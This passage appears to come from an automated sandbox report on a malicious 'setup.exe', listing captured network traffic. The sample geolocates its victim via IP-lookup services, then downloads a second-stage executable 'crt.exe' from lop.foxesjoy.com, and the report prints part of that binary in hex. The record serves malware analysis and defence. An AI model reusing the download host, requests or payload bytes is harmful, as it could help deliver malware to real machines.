58 73 53 32 56 73 53 33 63 71 53 38 60 71 53 37 70 71 53 34 5b 72 53 31 43 72 53 32 5c 72 53 30 5e 72 53 30 5b 72 53 38 51 72 53 37 56 72 53 31 55 72 53 34 7a 71 53 37 56 73 53 30 64 73 53 37 58 73 53 35 56 73 53 34 45 72 53 33 6a 71 53 32 51 72 53 31 7a 71 53 33 56 73 53 31 64 73 53 34 58 73 53 34 56 73 53 34 5e 73 53 36 49 72 53 36 4f 72 53 33 6b 71 53 31 45 72 53 33 46 72 53 30 5b 72 53 38 78 71 53 36 51 72 53 32 45 72 53 33 5c 72 53 32 4f 72 53 32 5a 72 53 31 65 71 53 36 56 73 53 30 64 73 53 34 58 73 53 39 56 73 53 36 44 72 53 36 43 72 53 34 56 72 53 31 7a 71 53 35 44 72 53 36 51 72 53 39 5a [TRUNCATED] Data Ascii: -GrS3VsS0QrS9ErS8FrS7[rS9zqS7ErS7\rS0VsS3NsS7XsS0GrS4VsS1WrS0VsS4NsS3XsS7aqS1VsS5YqS1ZrS1ErS2FrS6VrS1[rS7CrS4\rS5`qS3YrS2]rS2UrS4VsS8dsS0XsS2VsS3cqS8`qS7pqS4[rS1CrS2\rS0^rS0[rS8QrS7VrS1UrS4zqS7VsS0dsS7XsS5VsS4ErS3jqS2QrS1zqS3VsS1dsS4XsS4VsS4^sS6IrS6OrS3kqS1ErS3FrS0[rS8xqS6QrS2ErS3\rS2OrS2ZrS1eqS6VsS0dsS4XsS9VsS6DrS6CrS4VrS1zqS5DrS6QrS9ZrS1YrS3FrS1BrS3VsS3dsS3XsS3VsS9]qS4UrS2PrS0ZqS5ErS0^rS9UrS6zqS4VsS4dsS5XsS4VsS6uqS6\rS2UrS9FrS4QrS6PrS2PrS3UrS6zqS7VsS1dsS5XsS3VsS7yqS0]rS7VrS0TrS6zqS7WrS3VsS1dsS6XsS6VsS0wqS3YrS5OrS5zqS0[rS4yqS6[rS2TrS4FrS5XsS0^qS1YrS3yqS1ErS1QrS9^rS3XsS7YqS6FrS1ErS7VrS4YrS1[rS6VsS3gqS4dsS6XsS1VsS9DrS0VsS2NsS8XsS9aqS3VsS0^sS9YqS7ZrS0ErS2FrS9VrS7[rS1CrS1\rS2`qS3YrS7]rS0UrS3VsS3gqS1MrS1dsS6XsS5VsS8OrS2ZrS5zqS6[rS1]rS6YrS2ErS2]rS1yqS2VsS1NsS9XsS4aqS3VsS0QrS8QrS6QrS9QrS6QrS8VrS8SrS1UrS3BrS8XrS8WrS8VrS5TrS9TrS6ZrS9XrS1PrS5WrS0Tr
Jul 2, 2024 00:06:39.713902950 CEST	1236	IN	Data Raw: 53 35 58 72 53 32 53 72 53 32 5c 72 53 33 5c 72 53 39 54 72 53 32 54 72 53 30 5c 72 53 33 54 72 53 31 4f 72 53 33 54 72 53 39 54 72 53 30 50 72 53 38 53 72 53 36 56 73 53 32 64 73 53 32 58 73 53 31 56 73 53 30 51 72 53 33 51 72 53 38 51 72 53 34 Data Ascii: S5XrS2SrS2\rS3\rS9TrS2TrS0\rS3TrS1OrS3TrS9TrS0PrS8SrS6VsS2dsS2XsS1VsS0QrS3QrS8QrS4QrS0QrS8UrS4XrS8QrS3SrS6ZrS4\rS6PrS7OrS5XrS9YrS1^rS5YrS7\rS3VrS3BrS0WrS2SrS6]rS5OrS4]rS5VrS1TrS4^rS2BrS8SrS4XrS2TrS0VsS8dsS1XsS2VsS4QrS5QrS4QrS0QrS3QrS9BrS0VrS3O
Jul 2, 2024 00:06:39.713917971 CEST	448	IN	Data Raw: 53 36 5b 72 53 30 59 72 53 39 5c 72 53 30 57 72 53 39 51 72 53 31 56 72 53 33 54 72 53 35 58 72 53 31 53 72 53 30 50 72 53 39 5b 72 53 31 58 72 53 32 5e 72 53 38 51 72 53 31 50 72 53 37 5d 72 53 35 51 72 53 36 59 72 53 30 55 72 53 34 51 72 53 38 Data Ascii: S6[rS0YrS9\rS0WrS9QrS1VrS3TrS5XrS1SrS0PrS9[rS1XrS2^rS8QrS1PrS7]rS5QrS6YrS0UrS4QrS8SrS0YrS3OrS9PrS9[rS5^rS5]rS8ZrS3VsS5dsS5XsS6VsS1QrS6YrS0YrS9]rS5VrS3WrS7VrS2\rS0SrS7TrS7OrS0YrS0BrS7XrS3[rS1ZrS5PrS2XrS0UrS4\rS4WrS8QrS3ZrS8ZrS3^rS7ZrS2OrS2OrS6B
Jul 2, 2024 00:06:39.713927031 CEST	1236	IN	Data Raw: 53 34 51 72 53 37 56 72 53 34 4f 72 53 36 5d 72 53 32 5c 72 53 36 57 72 53 32 5b 72 53 33 42 72 53 33 4f 72 53 33 57 72 53 37 55 72 53 35 53 72 53 34 5c 72 53 33 5d 72 53 36 58 72 53 34 53 72 53 38 59 72 53 36 5a 72 53 31 51 72 53 30 53 72 53 34 Data Ascii: S4QrS7VrS4OrS6]rS2\rS6WrS2[rS3BrS3OrS3WrS7UrS5SrS4\rS3]rS6XrS4SrS8YrS6ZrS1QrS0SrS4BrS3[rS5\rS8TrS3VsS2dsS0XsS2VsS7QrS1^rS6UrS8SrS7SrS3BrS0QrS9PrS8^rS5YrS8UrS6ZrS4SrS0PrS0UrS7QrS8SrS5]rS1TrS4ZrS8\rS1[rS5VrS8OrS4YrS5XrS8OrS1]rS5PrS3[rS4\rS6PrS5V
Jul 2, 2024 00:06:39.713947058 CEST	1236	IN	Data Raw: 53 37 51 72 53 31 56 72 53 34 58 72 53 31 56 73 53 37 64 73 53 37 58 73 53 37 56 73 53 31 50 72 53 37 5a 72 53 38 50 72 53 30 5e 72 53 38 56 72 53 33 4f 72 53 39 53 72 53 30 50 72 53 37 58 72 53 31 50 72 53 33 5e 72 53 33 59 72 53 36 42 72 53 34 Data Ascii: S7QrS1VrS4XrS1VsS7dsS7XsS7VsS1PrS7ZrS8PrS0^rS8VrS3OrS9SrS0PrS7XrS1PrS3^rS3YrS6BrS4UrS5SrS6PrS3UrS6OrS6^rS8]rS6OrS6\rS3\rS8VrS7VrS9\rS5[rS3BrS5\rS0ZrS9XrS1]rS4VsS5dsS7XsS6VsS2PrS2ZrS1]rS4]rS7[rS5]rS1YrS1YrS5\rS1YrS6SrS4[rS9TrS4WrS0XrS9OrS3QrS2B
Jul 2, 2024 00:06:39.713956118 CEST	1236	IN	Data Raw: 53 30 5c 72 53 34 50 72 53 31 5d 72 53 35 59 72 53 34 5e 72 53 39 4f 72 53 38 5c 72 53 30 51 72 53 32 5b 72 53 39 58 72 53 32 54 72 53 36 53 72 53 31 5c 72 53 33 5d 72 53 30 5e 72 53 37 5a 72 53 37 5a 72 53 36 50 72 53 31 56 73 53 32 64 73 53 31 Data Ascii: S0\rS4PrS1]rS5YrS4^rS9OrS8\rS0QrS2[rS9XrS2TrS6SrS1\rS3]rS0^rS7ZrS7ZrS6PrS1VsS2dsS1XsS6VsS6OrS0PrS7ZrS6\rS9UrS8YrS3PrS2OrS4PrS3SrS1OrS8YrS9YrS2OrS7QrS7YrS9ZrS5WrS9UrS2TrS3YrS5UrS1UrS2TrS7YrS2UrS9UrS4^rS7VrS7\rS4YrS3^rS5VsS5dsS6XsS6VsS7OrS6UrS0Q
Jul 2, 2024 00:06:39.713975906 CEST	672	IN	Data Raw: 53 33 56 73 53 39 4f 72 53 31 5d 72 53 33 55 72 53 31 51 72 53 31 57 72 53 36 53 72 53 32 58 72 53 37 53 72 53 31 53 72 53 36 58 72 53 36 56 72 53 38 5e 72 53 33 4f 72 53 33 42 72 53 37 5c 72 53 33 4f 72 53 38 59 72 53 33 53 72 53 30 53 72 53 37 Data Ascii: S3VsS9OrS1]rS3UrS1QrS1WrS6SrS2XrS7SrS1SrS6XrS6VrS8^rS3OrS3BrS7\rS3OrS8YrS3SrS0SrS7^rS5[rS3PrS3BrS1XrS8PrS8WrS3QrS3PrS6ZrS3]rS5XrS5^rS7VsS4dsS0XsS9VsS3OrS3\rS4PrS1BrS7UrS0VrS2OrS6[rS2UrS0WrS6XrS0QrS3TrS1YrS7OrS7ZrS1[rS9UrS5ZrS7[rS0BrS1SrS8QrS5Q
Jul 2, 2024 00:06:39.713990927 CEST	1236	IN	Data Raw: 53 33 5a 72 53 33 5a 72 53 35 53 72 53 32 53 72 53 37 53 72 53 32 4f 72 53 32 5d 72 53 36 58 72 53 39 50 72 53 33 56 73 53 35 64 73 53 34 58 73 53 38 56 73 53 36 4f 72 53 38 42 72 53 36 50 72 53 33 53 72 53 30 5a 72 53 32 42 72 53 38 51 72 53 33 Data Ascii: S3ZrS3ZrS5SrS2SrS7SrS2OrS2]rS6XrS9PrS3VsS5dsS4XsS8VsS6OrS8BrS6PrS3SrS0ZrS2BrS8QrS3^rS9TrS5TrS6SrS1]rS0SrS9[rS0OrS0]rS3\rS8YrS5SrS1TrS7ZrS0QrS7^rS3SrS7ZrS1]rS2QrS3UrS6]rS4TrS1TrS9[rS3VsS0dsS1XsS7VsS4VrS0QrS2QrS9\rS8SrS5^rS9BrS4OrS8BrS8WrS0XrS6X
Jul 2, 2024 00:06:39.714006901 CEST	1236	IN	Data Raw: 53 39 51 72 53 31 5d 72 53 34 42 72 53 33 57 72 53 39 5b 72 53 31 53 72 53 35 5d 72 53 32 57 72 53 33 5d 72 53 39 5c 72 53 32 5d 72 53 35 42 72 53 37 54 72 53 32 5a 72 53 34 54 72 53 31 42 72 53 37 50 72 53 35 53 72 53 31 55 72 53 34 56 72 53 33 Data Ascii: S9QrS1]rS4BrS3WrS9[rS1SrS5]rS2WrS3]rS9\rS2]rS5BrS7TrS2ZrS4TrS1BrS7PrS5SrS1UrS4VrS3BrS5]rS5TrS3]rS7VsS7dsS3XsS8VsS0VrS5XrS0ZrS2SrS9YrS4QrS2ZrS9[rS3]rS3XrS1WrS5QrS3PrS9XrS0VrS3[rS2VrS1^rS3UrS5]rS1ZrS4\rS2ZrS0PrS9\rS2PrS4TrS1OrS2[rS1]rS6QrS4]rS1V
Jul 2, 2024 00:06:39.714021921 CEST	1236	IN	Data Raw: 53 31 55 72 53 37 5b 72 53 38 5d 72 53 39 56 73 53 31 64 73 53 35 58 73 53 36 56 73 53 30 56 72 53 36 42 72 53 31 56 72 53 32 5d 72 53 30 5a 72 53 35 54 72 53 34 5b 72 53 38 4f 72 53 35 59 72 53 33 5e 72 53 30 5c 72 53 36 55 72 53 39 57 72 53 35 Data Ascii: S1UrS7[rS8]rS9VsS1dsS5XsS6VsS0VrS6BrS1VrS2]rS0ZrS5TrS4[rS8OrS5YrS3^rS0\rS6UrS9WrS5UrS4OrS3TrS4XrS2SrS0YrS7]rS9XrS4VrS4UrS8OrS0WrS9QrS4OrS4ZrS2TrS6PrS8UrS4OrS8VsS7dsS1XsS1VsS4UrS6QrS6ZrS3UrS1PrS3QrS4]rS0YrS9[rS2BrS9VrS5ZrS2UrS7TrS5\rS5VrS5\rS1]
Jul 2, 2024 00:06:39.721611023 CEST	1236	IN	Data Raw: 53 30 58 72 53 37 56 72 53 35 59 72 53 36 51 72 53 37 5a 72 53 35 5d 72 53 33 53 72 53 36 5b 72 53 38 51 72 53 37 58 72 53 34 4f 72 53 30 50 72 53 37 42 72 53 39 58 72 53 35 54 72 53 30 5d 72 53 30 5d 72 53 32 54 72 53 31 56 73 53 30 64 73 53 36 Data Ascii: S0XrS7VrS5YrS6QrS7ZrS5]rS3SrS6[rS8QrS7XrS4OrS0PrS7BrS9XrS5TrS0]rS0]rS2TrS1VsS0dsS6XsS9VsS6UrS7YrS5ZrS5ZrS8SrS0UrS6WrS0[rS2\rS7ZrS7UrS4YrS9^rS4YrS1QrS0YrS7VrS5[rS3]rS2TrS8TrS7BrS6BrS6^rS8TrS3ZrS9UrS8OrS0]rS0WrS7QrS4SrS1VsS1dsS2XsS9VsS7UrS4YrS2Y

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	104.26.9.59	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:04:59 UTC	187	OUT	GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: api.myip.com
2024-07-01 22:04:59 UTC	561	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:04:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROtsPW96Dcum3YO6eVKL2zE2ZtCskjIShN3tduDeC5bhJxlgx92Ruu1vH4CPRUx6iZfW1iXhzaszrmEBWbINwD3xiRXaZJtUXEPLGZGfbVxytuHOdDmb8%2FwQ9BZm9w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c9b1ea69238c6c-EWR
2024-07-01 22:04:59 UTC	62	IN	Data Raw: 33 38 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 63 22 3a 22 55 53 22 7d 0d 0a Data Ascii: 38{"ip":"8.46.123.33","country":"United States","cc":"US"}
2024-07-01 22:04:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49712	34.117.186.192	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:00 UTC	236	OUT	GET /widget/demo/8.46.123.33 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: ipinfo.io
2024-07-01 22:05:00 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 01 Jul 2024 22:05:00 GMT content-type: application/json; charset=utf-8 Content-Length: 1025 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-07-01 22:05:00 UTC	876	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 Data Ascii: { "input": "8.46.123.33", "data": { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level
2024-07-01 22:05:00 UTC	149	IN	Data Raw: 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 61 75 70 2e 6c 75 6d 65 6e 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 43 65 6e 74 75 72 79 6c 69 6e 6b 20 41 62 75 73 65 20 44 65 73 6b 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 31 2d 38 37 37 2d 38 38 36 2d 36 35 31 35 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d Data Ascii: email": "abuse@aup.lumen.com", "name": "Centurylink Abuse Desk", "network": "8.46.123.0/24", "phone": "+1-877-886-6515" } }}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49730	188.114.96.3	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:08 UTC	203	OUT	GET /ssl/crt.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: lop.foxesjoy.com Cache-Control: no-cache
2024-07-01 22:05:08 UTC	759	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:08 GMT Content-Type: application/octet-stream Content-Length: 5391535 Connection: close Content-Description: File Transfer Content-Disposition: attachment; filename=crt.exe Content-Transfer-Encoding: binary Expires: 0 Cache-Control: must-revalidate Pragma: public CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SiSk22%2FjAVLw078dYOOiAr09lOdyM9wD2A6S3lG0Xcz1N%2FCSvPVNMLqh4pLXpf%2FF7YEMXSMmE%2BJCDNjh9DKiU9cQIZ7O7WnFvYlaBzFC%2BH%2BXCQVoMwEhFpDxmZgsw%2BGYq4o9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c9b21e8add7cea-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: 65 13 00 d4 28 40 00 0c 46 72 65 65 49 6e 73 74 61 6e 63 65 07 54 4f 62 6a 65 63 74 8d 40 00 c3 8d 40 00 ff 25 20 d1 40 00 8b c0 ff 25 1c d1 40 00 8b c0 ff 25 18 d1 40 00 8b c0 ff 25 14 d1 40 00 8b c0 ff 25 10 d1 40 00 8b c0 ff 25 0c d1 40 00 8b c0 ff 25 08 d1 40 00 8b c0 ff 25 28 d1 40 00 8b c0 ff 25 04 d1 40 00 8b c0 ff 25 00 d1 40 00 8b c0 ff 25 fc d0 40 00 8b c0 ff 25 f8 d0 40 00 8b c0 ff 25 f4 d0 40 00 8b c0 ff 25 f0 d0 40 00 8b c0 ff 25 ec d0 40 00 8b c0 ff 25 e8 d0 40 00 8b c0 ff 25 e4 d0 40 00 8b c0 ff 25 e0 d0 40 00 8b c0 ff 25 dc d0 40 00 8b c0 ff 25 d8 d0 40 00 8b c0 ff 25 d4 d0 40 00 8b c0 ff 25 40 d1 40 00 8b c0 ff 25 3c d1 40 00 8b c0 ff 25 38 d1 40 00 8b c0 ff 25 34 d1 40 00 8b c0 ff 25 30 d1 40 00 8b c0 ff 25 d0 d0 40 00 8b c0 ff 25 cc d0 Data Ascii: e(@FreeInstanceTObject@@% @%@%@%@%@%@%@%(@%@%@%@%@%@%@%@%@%@%@%@%@%@%@@%<@%8@%4@%0@%@%
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: e8 ad fb ff ff 85 c0 75 0a c7 05 18 c4 40 00 02 00 00 00 8b 36 81 fe 3c c4 40 00 75 c0 5a 5d 5f 5e 5b c3 8d 40 00 53 56 57 55 83 c4 f8 8b f2 8b f8 bd 4c c4 40 00 81 c7 ff 3f 00 00 81 e7 00 c0 ff ff 8b 5d 00 eb 33 3b 7b 0c 7f 2c 8b ce 8b d7 8b 43 08 e8 ba fe ff ff 83 3e 00 74 50 8b 46 04 01 43 08 8b 46 04 29 43 0c 83 7b 0c 00 75 3e 8b c3 e8 ec fb ff ff eb 35 8b 1b 3b dd 75 c9 8b d6 8b c7 e8 f7 fc ff ff 83 3e 00 74 21 8b cc 8b d6 8b c5 e8 e3 fb ff ff 83 3c 24 00 75 a5 8b cc 8b 56 04 8b 06 e8 b1 fd ff ff 33 c0 89 06 59 5a 5d 5f 5e 5b c3 8b c0 53 56 57 55 83 c4 ec 89 0c 24 8b fa 8b f0 bd 4c c4 40 00 81 c7 ff 3f 00 00 81 e7 00 c0 ff ff 8b 5d 00 eb 02 8b 1b 3b dd 74 05 3b 73 08 75 f5 3b 73 08 75 57 3b 7b 0c 0f 8e 96 00 00 00 8d 4c 24 04 8b d7 2b 53 0c 8b 43 08 Data Ascii: u@6<@uZ]_^[@SVWUL@?]3;{,C>tPFCF)C{u>5;u>t!<$uV3YZ]_^[SVWU$L@?];t;su;suW;{L$+SC
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: ea 0c 8b 72 08 2b c6 3b 70 08 74 0a c7 05 18 c4 40 00 06 00 00 00 e8 9a fe ff ff 03 de 8b c3 5e 5b c3 8d 40 00 53 56 57 8b d8 33 ff 8b 03 a9 00 00 00 80 74 0b 25 fc ff ff 7f 03 f8 03 d8 8b 03 a8 02 75 13 8b f3 8b c6 e8 68 fe ff ff 8b 46 08 03 f8 03 d8 83 23 fe 8b c7 5f 5e 5b c3 53 56 57 55 83 c4 f8 8b fa 8b f0 8b c6 e8 9a fe ff ff 8b d8 8b 6b 08 8b c5 03 43 0c 8b d0 8d 0c 37 2b d1 83 fa 0c 7f 04 8b f8 2b fe 8b c6 2b c5 83 f8 0c 7d 12 8b cc 8b d6 2b 53 08 03 d7 8b c5 e8 df fb ff ff eb 0f 8b cc 8b d7 83 ea 04 8d 46 04 e8 ce fb ff ff 8b 2c 24 85 ed 75 04 33 c0 eb 30 8b d5 2b d6 8b c6 e8 70 fe ff ff 8b c5 03 44 24 04 8b 53 08 03 53 0c 3b c2 73 0a 8d 14 37 2b d0 e8 aa fe ff ff 8b d4 8b c3 e8 a9 f6 ff ff b0 01 59 5a 5d 5f 5e 5b c3 53 56 57 8b f2 8b f8 8b df 89 Data Ascii: r+;pt@^[@SVW3t%uhF#_^[SVWUkC7+++}+SF,$u30+pD$SS;s7+YZ]_^[SVW
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: d8 33 c0 a3 18 c4 40 00 80 3d 15 c4 40 00 00 75 1f e8 9e f7 ff ff 84 c0 75 16 c7 05 18 c4 40 00 08 00 00 00 c7 45 fc 08 00 00 00 e9 61 01 00 00 33 c9 55 68 ee 22 40 00 64 ff 31 64 89 21 80 3d 32 c0 40 00 00 74 0a 68 1c c4 40 00 e8 bf f0 ff ff 8b f3 83 ee 04 8b 1e f6 c3 02 75 0f c7 05 18 c4 40 00 09 00 00 00 e9 f5 00 00 00 ff 0d fc c3 40 00 8b c3 25 fc ff ff 7f 83 e8 04 29 05 00 c4 40 00 f6 c3 01 74 45 8b c6 83 e8 0c 8b 50 08 83 fa 0c 7c 08 f7 c2 03 00 00 80 74 0f c7 05 18 c4 40 00 0a 00 00 00 e9 b6 00 00 00 8b c6 2b c2 3b 50 08 74 0f c7 05 18 c4 40 00 0a 00 00 00 e9 9e 00 00 00 03 da 8b f0 e8 90 f8 ff ff 81 e3 fc ff ff 7f 8b c6 03 c3 8b f8 3b 3d 70 c4 40 00 75 2c 29 1d 70 c4 40 00 01 1d 6c c4 40 00 81 3d 6c c4 40 00 00 3c 00 00 7e 05 e8 1f fb ff ff 33 c0 Data Ascii: 3@=@uu@Ea3Uh"@d1d!=2@th@u@@%)@tEP\|t@+;Pt@;=p@u,)p@l@=l@<~3
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: 03 f3 a4 fc 5f 5e c3 55 8b ec 83 c4 e8 8d 45 e8 50 e8 c9 ea ff ff 0f b7 45 f0 6b c0 3c 66 03 45 f2 6b c0 3c 31 d2 66 8b 55 f4 01 d0 69 c0 e8 03 00 00 66 8b 55 f6 01 d0 89 05 2c c0 40 00 8b e5 5d c3 90 b8 d2 00 00 00 e9 37 17 00 00 c3 90 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 57 89 c7 88 cd 89 c8 c1 e0 10 66 89 c8 89 d1 c1 f9 02 78 09 f3 ab 89 d1 83 e1 03 f3 aa 5f c3 90 69 15 2c c0 40 00 05 84 08 08 42 89 15 2c c0 40 00 f7 e2 89 d0 c3 8b c0 53 56 57 89 c6 50 85 c0 Data Ascii: _^UEPEk<fEk<1fUifU,@]7SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[Wfx_i,@B,@SVWP
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: 00 00 00 81 38 ce fa ed 0e 8b 50 18 8b 48 14 74 2f e8 30 fc ff ff 8b 15 0c c0 40 00 85 d2 0f 84 8b 00 00 00 ff d2 85 c0 0f 84 81 00 00 00 8b 54 24 0c e8 db fe ff ff 89 c2 8b 44 24 04 8b 48 0c 83 48 04 02 53 31 db 56 57 55 64 8b 1b 53 50 52 51 8b 54 24 28 6a 00 50 68 79 2c 40 00 52 e8 53 e5 ff ff 8b 7c 24 28 e8 d2 04 00 00 ff b0 00 00 00 00 89 a0 00 00 00 00 8b 6f 08 8b 5f 04 c7 47 04 a5 2c 40 00 83 c3 05 e8 cd fe ff ff ff e3 e9 52 01 00 00 e8 a5 04 00 00 8b 88 00 00 00 00 8b 11 89 90 00 00 00 00 8b 41 08 e9 5f fc ff ff b8 01 00 00 00 c3 90 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 17 01 00 00 81 38 ce fa ed 0e 74 1e e8 72 fb ff ff 8b 15 08 c0 40 00 85 d2 0f 84 fc 00 00 00 ff d2 85 c0 75 0a e9 f1 00 00 00 8b 40 18 8b 00 8b 54 24 08 53 56 57 55 8b 4a 04 8b 59 Data Ascii: 8PHt/0@T$D$HHS1VWUdSPRQT$(jPhy,@RS\|$(o_G,@RA_D$@8tr@u@T$SVWUJY
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: e8 98 ff ff ff 8b 05 d0 c3 40 00 50 e8 8c e0 ff ff 85 c0 74 01 c3 8b 05 8c c4 40 00 c3 50 e8 7a e0 ff ff 85 c0 74 d9 c3 90 8b 10 85 d2 74 19 c7 00 00 00 00 00 8b 4a f8 49 7c 0d 89 4a f8 75 08 8d 42 f8 e8 f5 f3 ff ff c3 53 56 89 c3 89 d6 8b 13 85 d2 74 19 c7 03 00 00 00 00 8b 4a f8 49 7c 0d 89 4a f8 75 08 8d 42 f8 e8 cf f3 ff ff 83 c3 04 4e 75 db 5e 5b c3 8b c0 85 d2 74 23 8b 4a f8 41 7f 1a 50 52 8b 42 fc e8 58 00 00 00 89 c2 58 52 8b 48 fc e8 7c f4 ff ff 5a 58 eb 03 89 4a f8 87 10 85 d2 74 13 8b 4a f8 49 7c 0d 89 4a f8 75 08 8d 42 f8 e8 84 f3 ff ff c3 8d 40 00 85 d2 74 09 8b 4a f8 41 7e 03 89 4a f8 87 10 85 d2 74 13 8b 4a f8 49 7c 0d 89 4a f8 75 08 8d 42 f8 e8 5a f3 ff ff c3 90 85 c0 7e 1c 50 83 c0 09 e8 33 f3 ff ff 83 c0 08 5a 89 50 fc c7 40 f8 01 00 00 Data Ascii: @Pt@PzttJI\|JuBSVtJI\|JuBNu^[t#JAPRBXXRH\|ZXJtJI\|JuB@tJA~JtJI\|JuBZ~P3ZP@
